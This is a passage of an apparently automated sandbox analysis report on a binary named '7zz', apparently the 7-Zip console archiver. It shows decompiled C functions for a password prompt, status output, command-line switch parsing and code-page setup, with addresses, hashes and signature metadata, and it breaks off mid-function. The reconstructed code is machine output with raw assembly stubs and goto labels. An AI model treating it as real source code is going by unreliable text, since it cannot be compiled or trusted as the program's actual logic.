                                                                      0x00406915
                                                                      0x0040691a
                                                                      0x00406922
                                                                      0x00406928
                                                                      0x00406928
                                                                      0x00406931
                                                                      0x00406938
                                                                      0x00406944
                                                                      0x0040694c
                                                                      0x0040695b
                                                                      0x00406963

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 004068A6
                                                                      • GetStdHandle.KERNEL32(000000F6,Enter password (will not be echoed):,?,?), ref: 004068CF
                                                                      • GetConsoleMode.KERNEL32(00000000,00000000,?,?), ref: 004068F3
                                                                      • SetConsoleMode.KERNEL32(00000000,00000000,?,?), ref: 00406904
                                                                      • SetConsoleMode.KERNEL32(00000000,00000000,?,?,?), ref: 00406928
                                                                      Strings
                                                                      • Enter password (will not be echoed):, xrefs: 004068BA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode$H_prologHandle
                                                                      • String ID: Enter password (will not be echoed):
                                                                      • API String ID: 2048311603-3720017889
                                                                      • Opcode ID: e4ab1c20882cafacc2701a80f49a49620683f374bc4d6d7f7edd82a9960cf4b7
                                                                      • Instruction ID: a8b37ca635c045820d6708ef6ebefb29507d7cb9e32fac769124ac422c1f2311
                                                                      • Opcode Fuzzy Hash: e4ab1c20882cafacc2701a80f49a49620683f374bc4d6d7f7edd82a9960cf4b7
                                                                      • Instruction Fuzzy Hash: 1111C671E051099BDB10ABA5CC45BEE77789F44329F10057EE406B22C1CB3C5E1487AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406564 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 71%
                                                                      			E00406564(void* __ecx) {
				void* _t15;
				void* _t18;
				void* _t29;
				void* _t31;

				E0046B890(E00473524, _t31);
				_push(__ecx);
				_t29 = __ecx;
				 *(_t31 - 0x10) = 0x490a88;
				EnterCriticalSection(0x490a88);
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				if( *((char*)(_t29 + 0x39)) == 0) {
					_t18 = _t29 + 8;
					if( *((char*)(_t31 + 0xc)) == 0) {
						_push("Compressing  ");
					} else {
						_push("Anti item    ");
					}
					E0040608D(_t18);
					_t13 =  *((intOrPtr*)(_t31 + 8));
					if( *((short*)( *((intOrPtr*)(_t31 + 8)))) == 0) {
						_t13 =  *0x48b344; // 0x48b388
					}
					E004060A5(_t18, _t13);
					if( *((char*)(_t29 + 0x38)) != 0) {
						E004060D4(_t18);
					}
					LeaveCriticalSection(0x490a88);
					_t15 = 0;
				} else {
					LeaveCriticalSection(0x490a88);
					_t15 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return _t15;
			}







                                                                      0x00406569
                                                                      0x0040656e
                                                                      0x00406576
                                                                      0x00406579
                                                                      0x0040657c
                                                                      0x00406582
                                                                      0x0040658a
                                                                      0x0040659c
                                                                      0x0040659f
                                                                      0x004065a8
                                                                      0x004065a1
                                                                      0x004065a1
                                                                      0x004065a1
                                                                      0x004065af
                                                                      0x004065b4
                                                                      0x004065bb
                                                                      0x004065bd
                                                                      0x004065bd
                                                                      0x004065c5
                                                                      0x004065ce
                                                                      0x004065d2
                                                                      0x004065d2
                                                                      0x004065d8
                                                                      0x004065de
                                                                      0x0040658c
                                                                      0x0040658d
                                                                      0x00406593
                                                                      0x00406593
                                                                      0x004065e6
                                                                      0x004065ee

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00406569
                                                                      • EnterCriticalSection.KERNEL32(00490A88), ref: 0040657C
                                                                      • LeaveCriticalSection.KERNEL32(00490A88), ref: 0040658D
                                                                      • LeaveCriticalSection.KERNEL32(00490A88), ref: 004065D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$Leave$EnterH_prolog
                                                                      • String ID: Anti item $Compressing
                                                                      • API String ID: 2532973370-3992608634
                                                                      • Opcode ID: a4d77a2cb10ab5a3c8563fdb07b5886aea9a05d8824471b2f091ec8e7e6115ac
                                                                      • Instruction ID: 580c09916b0a3b3df052708d1afcafaf12a43b80893965563734f36f16cd3c83
                                                                      • Opcode Fuzzy Hash: a4d77a2cb10ab5a3c8563fdb07b5886aea9a05d8824471b2f091ec8e7e6115ac
                                                                      • Instruction Fuzzy Hash: 6D01B571A00244BFDB21EF25DC85B6EB7E4AF49314F01483FE047A65D1C7BC99548769
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004256CE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 374COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E004256CE(void* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t148;
				signed int _t149;
				intOrPtr _t153;
				signed int _t155;
				signed int _t158;
				intOrPtr* _t160;
				signed int* _t161;
				void* _t163;
				signed int _t178;
				signed int _t182;
				signed int* _t183;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t209;
				signed int _t213;
				intOrPtr* _t218;
				signed int _t220;
				void* _t223;
				intOrPtr _t236;
				signed int _t237;
				void* _t273;
				signed int* _t299;
				intOrPtr _t306;
				intOrPtr _t307;
				signed int _t313;
				signed int _t315;
				void* _t316;

				E0046B890(E004765A8, _t316);
				_t311 = __ecx;
				E00403532(_t316 - 0x20,  *((intOrPtr*)(_t316 + 8)));
				_t305 = 0;
				 *((intOrPtr*)(_t316 - 4)) = 0;
				L00407ED0( *((intOrPtr*)(_t316 - 0x20)));
				if( *(_t316 - 0x1c) != 0) {
					_t228 =  *((intOrPtr*)(_t316 - 0x20));
					_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t316 - 0x20))));
					__eflags = _t148 - 0x58;
					if(_t148 != 0x58) {
						__eflags = _t148 - 0x53;
						if(_t148 != 0x53) {
							_t149 = E00408053(_t228, L"CRC");
							__eflags = _t149;
							if(_t149 != 0) {
								_t220 = E004263BA(_t316 - 0x20, _t316 - 0x10);
								E004072C9(_t316 - 0x20, _t316 - 0x2c, _t220);
								__eflags = _t220;
								 *((char*)(_t316 - 4)) = 1;
								if(_t220 != 0) {
									L42:
									__eflags =  *(_t316 - 0x10) - 0x2710;
									if( *(_t316 - 0x10) <= 0x2710) {
										_t153 =  *((intOrPtr*)(_t311 + 0x44));
										__eflags =  *(_t316 - 0x10) - _t153;
										if( *(_t316 - 0x10) >= _t153) {
											_t306 =  *((intOrPtr*)(_t311 + 0x10));
											 *(_t316 - 0x10) =  *(_t316 - 0x10) - _t153;
											__eflags = _t306 -  *(_t316 - 0x10);
											if(_t306 >  *(_t316 - 0x10)) {
												L49:
												_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t311 + 0x14)) +  *(_t316 - 0x10) * 4));
												__eflags =  *(_t316 - 0x28);
												 *((intOrPtr*)(_t316 - 0x14)) = _t307;
												if( *(_t316 - 0x28) != 0) {
													_t155 = E00425B6E(_t316 - 0x2c);
													__eflags = _t155;
													if(_t155 < 0) {
														L60:
														E00407A18( *((intOrPtr*)(_t316 - 0x2c)));
														E00407A18( *((intOrPtr*)(_t316 - 0x20)));
														_t158 = 0x80070057;
														goto L73;
													}
													 *((short*)(_t316 - 0x48)) = 0;
													 *((short*)(_t316 - 0x46)) = 0;
													_t160 = 0x48c9b0 + (_t155 + _t155 * 2) * 4;
													_t236 =  *_t160;
													 *((char*)(_t316 - 4)) = 7;
													__eflags = _t236 - 4;
													 *((intOrPtr*)(_t316 - 0x50)) = _t236;
													if(_t236 == 4) {
														L61:
														_t161 =  *(_t160 + 8);
														_t237 = 0;
														__eflags = 0;
														while(1) {
															__eflags =  *_t161;
															if( *_t161 == 0) {
																break;
															}
															_t237 = _t237 + 1;
															_t161 =  &(_t161[0]);
														}
														_t163 = E004072C9(_t316 - 0x2c, _t316 - 0x38, _t237);
														_push(_t316 + 8);
														 *((char*)(_t316 - 4)) = 8;
														_t305 = E00426261(_t163,  *(_t316 + 0xc), _t311);
														 *((char*)(_t316 - 4)) = 7;
														E00407A18( *((intOrPtr*)(_t316 - 0x38)));
														__eflags = _t305;
														if(_t305 == 0) {
															E0040C1A0(_t316 - 0x48,  *((intOrPtr*)(_t316 + 8)));
															__eflags =  *(_t316 - 0x10) -  *((intOrPtr*)(_t311 + 0x50));
															if( *(_t316 - 0x10) <=  *((intOrPtr*)(_t311 + 0x50))) {
																 *((intOrPtr*)(_t311 + 0x4c)) =  *((intOrPtr*)(_t316 + 8));
															}
															L69:
															_push(_t316 - 0x50);
															E00425C04( *((intOrPtr*)(_t316 - 0x14)));
															 *((char*)(_t316 - 4)) = 1;
															E0040C20F(_t316 - 0x48);
															L70:
															_t313 = 0;
															__eflags = 0;
															L71:
															E00407A18( *((intOrPtr*)(_t316 - 0x2c)));
															goto L72;
														}
														 *((char*)(_t316 - 4)) = 1;
														E0040C20F(_t316 - 0x48);
														L66:
														E00407A18( *((intOrPtr*)(_t316 - 0x2c)));
														E00407A18( *((intOrPtr*)(_t316 - 0x20)));
														_t158 = _t305;
														goto L73;
													}
													__eflags = _t236 - 1;
													if(_t236 == 1) {
														goto L61;
													}
													__eflags = _t236 - 2;
													if(_t236 == 2) {
														goto L61;
													}
													_t178 = E0042518A(_t316 - 0x2c);
													__eflags = _t178;
													if(_t178 < 0) {
														L59:
														 *((char*)(_t316 - 4)) = 1;
														E0040C20F(_t316 - 0x48);
														goto L60;
													}
													_t180 = _t178 + _t178 * 2;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													 *((intOrPtr*)(_t316 - 0x50)) =  *((intOrPtr*)(0x48c9b0 + (_t178 + _t178 * 2) * 4));
													asm("movsd");
													_t182 = E00425124( *((intOrPtr*)(0x48c9b0 + _t180 * 4 + 4)), _t316 - 0x48);
													__eflags = _t182;
													if(_t182 != 0) {
														goto L69;
													}
													goto L59;
												}
												_t183 =  *(_t316 + 0xc);
												__eflags =  *_t183 - 8;
												if( *_t183 != 8) {
													goto L45;
												}
												E00403532(_t316 - 0x38, _t183[2]);
												_push(_t316 - 0x38);
												_push(_t307);
												 *((char*)(_t316 - 4)) = 6;
												_t313 = E004251BA(_t311, __eflags);
												E00407A18( *((intOrPtr*)(_t316 - 0x38)));
												__eflags = _t313;
												if(_t313 == 0) {
													goto L70;
												}
												goto L71;
											}
											_t223 = _t311 + 8;
											do {
												E00405B9F(_t316 - 0x58);
												 *((intOrPtr*)(_t316 - 0x58)) = 0x47b178;
												 *((char*)(_t316 - 4)) = 4;
												E0040351A(_t316 - 0x44);
												_push(_t316 - 0x58);
												 *((char*)(_t316 - 4)) = 5;
												E00425C5B(_t223, _t306);
												 *((char*)(_t316 - 4)) = 1;
												E00422D4A(_t316 - 0x58);
												_t306 = _t306 + 1;
												__eflags = _t306 -  *(_t316 - 0x10);
											} while (_t306 <=  *(_t316 - 0x10));
											goto L49;
										}
										L45:
										_t313 = 0x80070057;
										goto L71;
									}
									_t313 = 0x80004005;
									goto L71;
								}
								E00407399(_t316 - 0x20, _t316 - 0x38, 2);
								 *((char*)(_t316 - 4)) = 2;
								_t195 = E0040807A(0x48c4a8);
								__eflags = _t195;
								 *((char*)(_t316 - 4)) = 1;
								E00407A18( *((intOrPtr*)(_t316 - 0x38)));
								__eflags = _t220 & 0xffffff00 | _t195 == 0x00000000;
								if((_t220 & 0xffffff00 | _t195 == 0x00000000) == 0) {
									_t197 = E0040807A(L"RSFX");
									__eflags = _t197;
									if(_t197 != 0) {
										_t198 = E0040807A("F");
										__eflags = _t198;
										if(_t198 != 0) {
											_t199 = E0040807A(L"HC");
											__eflags = _t199;
											if(_t199 != 0) {
												_t200 = E0040807A(L"HCF");
												__eflags = _t200;
												if(_t200 != 0) {
													_t201 = E0040807A(L"HE");
													__eflags = _t201;
													if(_t201 != 0) {
														_t202 = E0040807A(L"TC");
														__eflags = _t202;
														if(_t202 != 0) {
															_t203 = E0040807A(L"TA");
															__eflags = _t203;
															if(_t203 != 0) {
																_t204 = E0040807A(L"TM");
																__eflags = _t204;
																if(_t204 != 0) {
																	_t205 = E0040807A(0x48bb98);
																	__eflags = _t205;
																	if(_t205 != 0) {
																		 *(_t316 - 0x10) = 0;
																		goto L42;
																	}
																	_t299 =  *(_t316 + 0xc);
																	_t273 = _t311 + 0x40;
																	L34:
																	_t206 = E0042633E(_t273, _t299);
																	L30:
																	_t313 = _t206;
																	goto L71;
																}
																_t299 =  *(_t316 + 0xc);
																_t273 = _t311 + 0x37;
																goto L34;
															}
															_t299 =  *(_t316 + 0xc);
															_t273 = _t311 + 0x36;
															goto L34;
														}
														_t299 =  *(_t316 + 0xc);
														_t273 = _t311 + 0x35;
														goto L34;
													}
													_t206 = E0042633E(_t311 + 0x34,  *(_t316 + 0xc));
													__eflags = _t206;
													if(_t206 == 0) {
														 *((char*)(_t311 + 0x33)) = 1;
														goto L70;
													}
													goto L30;
												}
												 *((char*)(_t316 + 0xb)) = 1;
												_t207 = E0042633E(_t316 + 0xb,  *(_t316 + 0xc));
												__eflags = _t207;
												if(_t207 == 0) {
													__eflags =  *((char*)(_t316 + 0xb));
													if( *((char*)(_t316 + 0xb)) == 0) {
														_t305 = 0x80070057;
													}
												} else {
													_t305 = _t207;
												}
												goto L66;
											}
											_t299 =  *(_t316 + 0xc);
											_t273 = _t311 + 0x32;
											goto L34;
										}
										_t299 =  *(_t316 + 0xc);
										_t273 = _t311 + 0x38;
										goto L34;
									}
									_t299 =  *(_t316 + 0xc);
									_t273 = _t311 + 0x1c;
									goto L34;
								}
								_t209 = E004072C9(_t316 - 0x20, _t316 - 0x38, 2);
								 *((char*)(_t316 - 4)) = 3;
								_t313 = E004263EB(_t209,  *(_t316 + 0xc),  *((intOrPtr*)(_t311 + 0x48)), _t311);
								E00407A18( *((intOrPtr*)(_t316 - 0x38)));
								__eflags = _t313;
								if(_t313 != 0) {
									goto L71;
								}
								goto L70;
							}
							_t315 = __ecx + 4;
							__eflags = _t315;
							 *_t315 = 4;
							E004075A5(_t316 - 0x20, 0, 3);
							_push(_t315);
							goto L12;
						}
						E004075A5(_t316 - 0x20, 0, 1);
						__eflags =  *(_t316 - 0x1c);
						if( *(_t316 - 0x1c) != 0) {
							__eflags =  *( *(_t316 + 0xc));
							if( *( *(_t316 + 0xc)) != 0) {
								goto L1;
							}
							_push(_t316 - 0x20);
							_t213 = E0042547B(__ecx);
						} else {
							_push( *(_t316 + 0xc));
							_t213 = E00425585(__ecx);
						}
						goto L7;
					} else {
						E004075A5(_t316 - 0x20, 0, 1);
						_t218 = __ecx + 0x3c;
						_push(_t218);
						 *_t218 = 9;
						L12:
						_t213 = E00426145(_t316 - 0x20,  *(_t316 + 0xc));
						L7:
						_t313 = _t213;
						L72:
						E00407A18( *((intOrPtr*)(_t316 - 0x20)));
						_t158 = _t313;
						L73:
						 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
						return _t158;
					}
				}
				L1:
				_t313 = 0x80070057;
				goto L72;
			}










































                                                                      0x004256d3
                                                                      0x004256de
                                                                      0x004256e6
                                                                      0x004256ee
                                                                      0x004256f0
                                                                      0x004256f3
                                                                      0x004256fb
                                                                      0x00425707
                                                                      0x0042570a
                                                                      0x0042570d
                                                                      0x00425711
                                                                      0x0042572a
                                                                      0x0042572e
                                                                      0x0042576b
                                                                      0x00425770
                                                                      0x00425772
                                                                      0x004257a1
                                                                      0x004257ab
                                                                      0x004257b0
                                                                      0x004257b2
                                                                      0x004257b6
                                                                      0x00425957
                                                                      0x00425957
                                                                      0x0042595e
                                                                      0x0042596a
                                                                      0x0042596d
                                                                      0x00425970
                                                                      0x0042597c
                                                                      0x0042597f
                                                                      0x00425982
                                                                      0x00425985
                                                                      0x004259c6
                                                                      0x004259ce
                                                                      0x004259d1
                                                                      0x004259d4
                                                                      0x004259d7
                                                                      0x00425a18
                                                                      0x00425a1d
                                                                      0x00425a1f
                                                                      0x00425a97
                                                                      0x00425a9a
                                                                      0x00425aa2
                                                                      0x00425aa8
                                                                      0x00000000
                                                                      0x00425aad
                                                                      0x00425a24
                                                                      0x00425a28
                                                                      0x00425a2c
                                                                      0x00425a33
                                                                      0x00425a35
                                                                      0x00425a39
                                                                      0x00425a3c
                                                                      0x00425a3f
                                                                      0x00425ab3
                                                                      0x00425ab3
                                                                      0x00425ab6
                                                                      0x00425ab6
                                                                      0x00425ab8
                                                                      0x00425ab8
                                                                      0x00425abb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00425abd
                                                                      0x00425abf
                                                                      0x00425abf
                                                                      0x00425aca
                                                                      0x00425ad5
                                                                      0x00425ad8
                                                                      0x00425ae4
                                                                      0x00425ae6
                                                                      0x00425aea
                                                                      0x00425aef
                                                                      0x00425af2
                                                                      0x00425b1c
                                                                      0x00425b24
                                                                      0x00425b27
                                                                      0x00425b2c
                                                                      0x00425b2c
                                                                      0x00425b2f
                                                                      0x00425b35
                                                                      0x00425b36
                                                                      0x00425b3e
                                                                      0x00425b42
                                                                      0x00425b47
                                                                      0x00425b47
                                                                      0x00425b47
                                                                      0x00425b49
                                                                      0x00425b4c
                                                                      0x00000000
                                                                      0x00425b51
                                                                      0x00425af7
                                                                      0x00425afb
                                                                      0x00425b00
                                                                      0x00425b03
                                                                      0x00425b0b
                                                                      0x00425b11
                                                                      0x00000000
                                                                      0x00425b13
                                                                      0x00425a41
                                                                      0x00425a44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00425a46
                                                                      0x00425a49
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00425a4e
                                                                      0x00425a53
                                                                      0x00425a55
                                                                      0x00425a8b
                                                                      0x00425a8e
                                                                      0x00425a92
                                                                      0x00000000
                                                                      0x00425a92
                                                                      0x00425a5f
                                                                      0x00425a62
                                                                      0x00425a71
                                                                      0x00425a72
                                                                      0x00425a73
                                                                      0x00425a7d
                                                                      0x00425a7e
                                                                      0x00425a83
                                                                      0x00425a85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00425a85
                                                                      0x004259d9
                                                                      0x004259dc
                                                                      0x004259e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004259e8
                                                                      0x004259f2
                                                                      0x004259f3
                                                                      0x004259f4
                                                                      0x00425a00
                                                                      0x00425a02
                                                                      0x00425a07
                                                                      0x00425a0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00425a10
                                                                      0x00425987
                                                                      0x0042598a
                                                                      0x0042598d
                                                                      0x00425992
                                                                      0x0042599c
                                                                      0x004259a0
                                                                      0x004259aa
                                                                      0x004259ab
                                                                      0x004259af
                                                                      0x004259b7
                                                                      0x004259bb
                                                                      0x004259c0
                                                                      0x004259c1
                                                                      0x004259c1
                                                                      0x00000000
                                                                      0x0042598a
                                                                      0x00425972
                                                                      0x00425972
                                                                      0x00000000
                                                                      0x00425972
                                                                      0x00425960
                                                                      0x00000000
                                                                      0x00425960
                                                                      0x004257c5
                                                                      0x004257d1
                                                                      0x004257d5
                                                                      0x004257dd
                                                                      0x004257e2
                                                                      0x004257e6
                                                                      0x004257eb
                                                                      0x004257ee
                                                                      0x00425830
                                                                      0x00425835
                                                                      0x00425837
                                                                      0x0042584c
                                                                      0x00425851
                                                                      0x00425853
                                                                      0x00425868
                                                                      0x0042586d
                                                                      0x0042586f
                                                                      0x00425884
                                                                      0x00425889
                                                                      0x0042588b
                                                                      0x004258c3
                                                                      0x004258c8
                                                                      0x004258ca
                                                                      0x004258f3
                                                                      0x004258f8
                                                                      0x004258fa
                                                                      0x00425911
                                                                      0x00425916
                                                                      0x00425918
                                                                      0x0042592a
                                                                      0x0042592f
                                                                      0x00425931
                                                                      0x00425943
                                                                      0x00425948
                                                                      0x0042594a
                                                                      0x00425954
                                                                      0x00000000
                                                                      0x00425954
                                                                      0x0042594c
                                                                      0x0042594f
                                                                      0x00425902
                                                                      0x00425902
                                                                      0x004258db
                                                                      0x004258db
                                                                      0x00000000
                                                                      0x004258db
                                                                      0x00425933
                                                                      0x00425936
                                                                      0x00000000
                                                                      0x00425936
                                                                      0x0042591a
                                                                      0x0042591d
                                                                      0x00000000
                                                                      0x0042591d
                                                                      0x004258fc
                                                                      0x004258ff
                                                                      0x00000000
                                                                      0x004258ff
                                                                      0x004258d2
                                                                      0x004258d7
                                                                      0x004258d9
                                                                      0x004258e2
                                                                      0x00000000
                                                                      0x004258e2
                                                                      0x00000000
                                                                      0x004258d9
                                                                      0x00425893
                                                                      0x00425897
                                                                      0x0042589c
                                                                      0x0042589e
                                                                      0x004258a7
                                                                      0x004258ab
                                                                      0x004258b1
                                                                      0x004258b1
                                                                      0x004258a0
                                                                      0x004258a0
                                                                      0x004258a0
                                                                      0x00000000
                                                                      0x0042589e
                                                                      0x00425871
                                                                      0x00425874
                                                                      0x00000000
                                                                      0x00425874
                                                                      0x00425855
                                                                      0x00425858
                                                                      0x00000000
                                                                      0x00425858
                                                                      0x00425839
                                                                      0x0042583c
                                                                      0x00000000
                                                                      0x0042583c
                                                                      0x004257f9
                                                                      0x00425807
                                                                      0x00425813
                                                                      0x00425815
                                                                      0x0042581a
                                                                      0x0042581d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00425823
                                                                      0x00425774
                                                                      0x00425774
                                                                      0x0042577d
                                                                      0x00425783
                                                                      0x00425788
                                                                      0x00000000
                                                                      0x00425788
                                                                      0x00425736
                                                                      0x0042573b
                                                                      0x0042573e
                                                                      0x00425754
                                                                      0x00425757
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042575e
                                                                      0x0042575f
                                                                      0x00425740
                                                                      0x00425740
                                                                      0x00425745
                                                                      0x00425745
                                                                      0x00000000
                                                                      0x00425713
                                                                      0x00425719
                                                                      0x0042571e
                                                                      0x00425721
                                                                      0x00425722
                                                                      0x00425789
                                                                      0x0042578f
                                                                      0x0042574a
                                                                      0x0042574a
                                                                      0x00425b52
                                                                      0x00425b55
                                                                      0x00425b5b
                                                                      0x00425b5d
                                                                      0x00425b62
                                                                      0x00425b6b
                                                                      0x00425b6b
                                                                      0x00425711
                                                                      0x004256fd
                                                                      0x004256fd
                                                                      0x00000000

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 004256D3
                                                                        • Part of subcall function 00407ED0: __EH_prolog.LIBCMT ref: 00407ED5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: CRC$HCF$RSFX$-B
                                                                      • API String ID: 3519838083-950596765
                                                                      • Opcode ID: 81c17ac54e65c1df555e127d28f88444a92df1476759999909bb7db1c08ade0f
                                                                      • Instruction ID: 6c3dbe44b38eb95146665e90f90a400f3930304e0ccaa8816579fca9b7e0a093
                                                                      • Opcode Fuzzy Hash: 81c17ac54e65c1df555e127d28f88444a92df1476759999909bb7db1c08ade0f
                                                                      • Instruction Fuzzy Hash: 94E1C230A00529DBCF10EB95E8919EEB771EF44314FA0852FE44277291DB7CAA45CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00471830 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 92%
                                                                      			E00471830(int _a4) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				signed int _t40;
				signed int _t41;
				int _t43;
				signed int _t47;
				signed int _t49;
				int _t50;
				signed char* _t51;
				signed int _t55;
				signed char* _t57;
				signed int _t60;
				intOrPtr* _t63;
				signed int _t65;
				signed char _t66;
				signed char _t68;
				signed char _t69;
				signed int _t70;
				void* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				void* _t85;

				E0046E56A(0x19);
				_t50 = E004719DD(_a4);
				_t85 = _t50 -  *0x496228; // 0x4e4
				_a4 = _t50;
				if(_t85 != 0) {
					__eflags = _t50;
					if(_t50 == 0) {
						L30:
						E00471A5A();
					} else {
						_t65 = 0;
						__eflags = 0;
						_t36 = 0x490638;
						while(1) {
							__eflags =  *_t36 - _t50;
							if( *_t36 == _t50) {
								break;
							}
							_t36 = _t36 + 0x30;
							_t65 = _t65 + 1;
							__eflags = _t36 - 0x490728;
							if(_t36 < 0x490728) {
								continue;
							} else {
								_t43 = GetCPInfo(_t50,  &_v28);
								_t81 = 1;
								__eflags = _t43 - _t81;
								if(_t43 != _t81) {
									__eflags =  *0x49384c;
									if( *0x49384c == 0) {
										_t77 = _t81 | 0xffffffff;
										__eflags = _t77;
									} else {
										goto L30;
									}
								} else {
									 *0x496444 =  *0x496444 & 0x00000000;
									_t60 = 0x40;
									__eflags = _v28 - _t81;
									memset(0x496340, 0, _t60 << 2);
									asm("stosb");
									 *0x496228 = _t50;
									if(__eflags <= 0) {
										 *0x49623c =  *0x49623c & 0x00000000;
										__eflags =  *0x49623c;
									} else {
										__eflags = _v22;
										if(_v22 != 0) {
											_t63 =  &_v21;
											while(1) {
												_t69 =  *_t63;
												__eflags = _t69;
												if(_t69 == 0) {
													goto L24;
												}
												_t49 =  *(_t63 - 1) & 0x000000ff;
												_t70 = _t69 & 0x000000ff;
												while(1) {
													__eflags = _t49 - _t70;
													if(_t49 > _t70) {
														break;
													}
													 *(_t49 + 0x496341) =  *(_t49 + 0x496341) | 0x00000004;
													_t49 = _t49 + 1;
												}
												_t63 = _t63 + 2;
												__eflags =  *(_t63 - 1);
												if( *(_t63 - 1) != 0) {
													continue;
												}
												goto L24;
											}
										}
										L24:
										_t47 = _t81;
										do {
											 *(_t47 + 0x496341) =  *(_t47 + 0x496341) | 0x00000008;
											_t47 = _t47 + 1;
											__eflags = _t47 - 0xff;
										} while (_t47 < 0xff);
										 *0x496444 = E00471A27(_t50);
										 *0x49623c = _t81;
									}
									_t71 = 0x496230;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L31:
									E00471A83(_t50, _t71);
									goto L1;
								}
							}
							goto L33;
						}
						_v8 = _v8 & 0x00000000;
						_t55 = 0x40;
						memset(0x496340, 0, _t55 << 2);
						_t79 = _t65 + _t65 * 2 << 4;
						__eflags = _t79;
						asm("stosb");
